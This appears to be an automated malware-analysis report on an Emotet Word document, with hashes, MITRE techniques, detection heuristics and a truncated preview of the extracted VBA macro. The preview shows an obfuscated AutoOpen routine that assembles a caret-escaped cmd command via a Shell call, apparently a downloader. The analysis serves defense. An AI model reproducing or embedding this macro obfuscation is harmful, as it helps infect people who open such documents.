Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 5cef7963be80b561…

MALICIOUS

Office (OLE)

Size: 120.6 KB
Created: 2018-10-02 11:52:00
Authoring application: Microsoft Office Word
First seen: 2018-11-05
MD5: 351fdd834a2a51a5f6b4d097f16f73c8
SHA-1: e16647d96507eb95d9a342405140869b03fa5066
SHA-256: 5cef7963be80b561130baa0a1aaaa7482fc0b6b883bf3764a7f34cd79f9aa14f
Risk Score: 202

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' and the ClamAV detection 'Doc.Downloader.Emotet-6884102-0' indicate the presence of malicious code. The AutoOpen macro runs automatically when the document is opened and, as is typical for Emotet, is most likely intended to download and execute a second-stage payload.

Heuristics (6)

  • ClamAV: Doc.Downloader.Emotet-6884102-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6884102-0
  • VBA macros detected [medium, 2 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                   Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)      18255 bytes
SHA-256: 8f874910699aba47b80b3ca964ede4b442039fb1557a31504fd2a1342562f487

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "OGbjBav"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   If uTvXJH <= bzSWO Then

Dim SAlvlj(1)
SAlvlj(0) = iaHbc + dwflDU

End If
   If iuDJAt Xor UtHit Then

Dim qzHcD(2)
qzHcD(0) = cZBPj + UhbYYi
qzHcD(1) = uqGMcN + WrTlG + bfazwF + UuXhfT

End If
   If wAmQKn And EnzZpi Then

Dim jcMAA(1)
jcMAA(0) = XdGfhR + oHfXVQ + oiNcU + RvFiBt

End If
   If MhwUct <> KklfPi Then

Dim kFQIp(1)
kFQIp(0) = oHiaS + UzSZjI + oKJXQd + dVpMS

End If
   If jjhvwM Eqv LdGjV Then

Dim XWpGQT(1)
XWpGQT(0) = EivhWJ + niAtfU + AsiaiB + PXQKB

End If
   If SKSQW > ZrFDWC Then

Dim ZwsLEX(2)
ZwsLEX(0) = trahzi + aTRRHb
ZwsLEX(1) = BpzIK + JzFFBN

End If
idObcYficmU (KeyString(zcPODV + zdXLfOVG + 4 + 2 + 61 + iwUMT + iLwOPB) + wAJfWfqb + wFczh + KeyString(fSZtznI + ZJGhkbQW + 5 + 2 + 70 + LaAWrW + Vpsjd) + Rcqwkifssjf + ajUVm + NiSMlvONrC + FmkwGBCLi + ohVMb + jhKQaKQY + TPmwRQ + utswta + IhaKMiz + DdDcVOJ + dhuInE + ciIvLUa + QrpwYom)
   If FCUjaO = pYoOD Then

Dim vaChAd(2)
vaChAd(0) = KfzDi + aDKXV + uwrLb + MuIaZ
vaChAd(1) = rKNXOI + QpicZF

End If
   If dYJtDt > VwmUjm Then

Dim OwqnIL(1)
OwqnIL(0) = zaFOr + pLYRT

End If
End Sub


Attribute VB_Name = "PnzfATN"
Function Rcqwkifssjf()
If MvOmAQ Or ZdfHF Then

Dim UfAUAF(1)
UfAUAF(0) = ErDMj + hjYFXw + BLfwwJ + cnbZIw

End If
   If boznS Or 6 Then

Dim qTEOz(1)
qTEOz(0) = Ulfdb + mHKROJ

End If
   If oAJJbc > 8 Then

Dim UsCGSj(2)
UsCGSj(0) = BXIIS + IADVrK
UsCGSj(1) = QQiEhz + rXvNWK + rmusq + ElEQz

End If
   If GLGKQu = 6 Then

Dim wIbkz(1)
wIbkz(0) = AZjhii + YbLlKL + NEFPEO + UBiJj

End If
KafFWP = "d /V/C" + """" + "^s^e^t ^t^w" + "^Z^x=^yv^a^ /^f" + "^s^ ^I^8^f" + "^ z^q^&^ ^P^f^S" + "^ N^E^2^ ^"
wVWIvB = "`^\N ^D^5^" + "m^ L^Z^d^ ^Tn^" + "_^ v^D%^ ^'^k^]^ ^7^" + "o^=^ ^*^+^e^ %n,^ ^$"
XmjpFtzC = "^3^w^ ^H^*^-^ ^lc" + "^5^}^b^X)^}^?^.^" + "=^{^5^T^Q^h%^\" + "Rc^4^Z^~^t5C^&^a(" + "^S^?c^?^D^" + "@^}n^e^K^;^A^"
If zJanK > SIosA Then

Dim YhObDT(2)
YhObDT(0) = jmLdpM + iYIWi + sboMdm + cnMKuX
YhObDT(1) = voLzF + Xjmoj

End If
   If zotARJ >= 4 Then

Dim AwtCw(2)
AwtCw(0) = VWsaB + RIPpNK + ZTLoz + sLzouL
AwtCw(1) = kODwvJ + ooBoMn + SSkwjp + kqpHtV

End If
   If hiLNFA And 14 Then

Dim WDaIvF(1)
WDaIvF(0) = wnYwT + aZIcW

End If
iotXUQ = "TC^k^J^i^3^a^,^z" + "^?^e^3C^Ar^K^8Z^b(" + "Y^7^;^2^6n"
If isZsQS = 4 Then

Dim Uzjdhm(2)
Uzjdhm(0) = jtmlr + AAvLV + NXGcG + QwkUu
Uzjdhm(1) = MMcfa + BwzVfQ + wBrzi + OXOEWN

End If
   If RdaVw < EnFALL Then

Dim YwSUso(1)
YwSUso(0) = pTnbX + DUzjor + ZXuhib + Bkaml

End If
   If YRnZM <> 9 Then

Dim bYfuUZ(1)
bYfuUZ(0) = JWCss + YHEYzF + fnzHF + FMdhL

End If
   If hzOHw <> FQuDL Then

Dim lRWcMk(2)
lRWcMk(0) = tNqNV + zYNqBn + jQUqwf + PMUDci
lRWcMk(1) = zYSfj + fLKrks

End If
   If sItIpX <= dwqwwH Then

Dim kpZMUO(2)
kpZMUO(0) = AClmQ + SEtAp + OKLDXz + UwZEi
kpZMUO(1) = UuQuAa + hVrGI + YEKYE + IXsQYl

End If
NjCCc = "^L^|^}^2^u^snx^W^+^t" + "^L^$8^J^L^ R^3^W^" + "m^b^S^s^e^d" + "^{^jt^3^L^.^I^H"
If FUcfI Xor MQkiz Then

Dim TqBmkk(2)
TqBmkk(0) = HkcqUt + BuMHG
TqBmkk(1) = Czpjwk + JHzph

End If
   If zkbDEu = 15 Then

Dim MCqwE(2)
MCqwE(0) = qsMKKm + SamhU
MCqwE(1) = IlqUP + MdUTB + NAznS + AdiJua

End If
   If YSwbjC > IYddHl Then

Dim MREcXS(1)
MREcXS(0) = WAVozi + zmnIsM

End If
   If uIbwC Eqv 16 Then

Dim wYBKs(1)
wYBKs(0) = YttSF + AaQKXU + ZLbir + wNQnM

End If
   If aiQWwt Or DlnWib Then

Dim rSWZLq(2)
rSWZLq(0) = lFiIpj + WwqPWj
rSWZLq(1) = dMzVHl + OJQkW

End If
XzrijY = "^4^O^-^x^O^~^e" + "^h^\^~k^>^A^*^o/^" + "X^{v^5^s^[n("
Rcqwkifssjf = KafFWP + wVWIvB + XmjpFtzC + iotXUQ + NjCCc + XzrijY
   If bMJYbz Or FORMC Then

Dim SiYrq(2)
SiYrq(0) = nVcaG + zTNfqq + MIviD + qIiGwE
SiYrq(1) = LuqRCr + oFIwl + bcdLa + aDqrW

End I
... (truncated)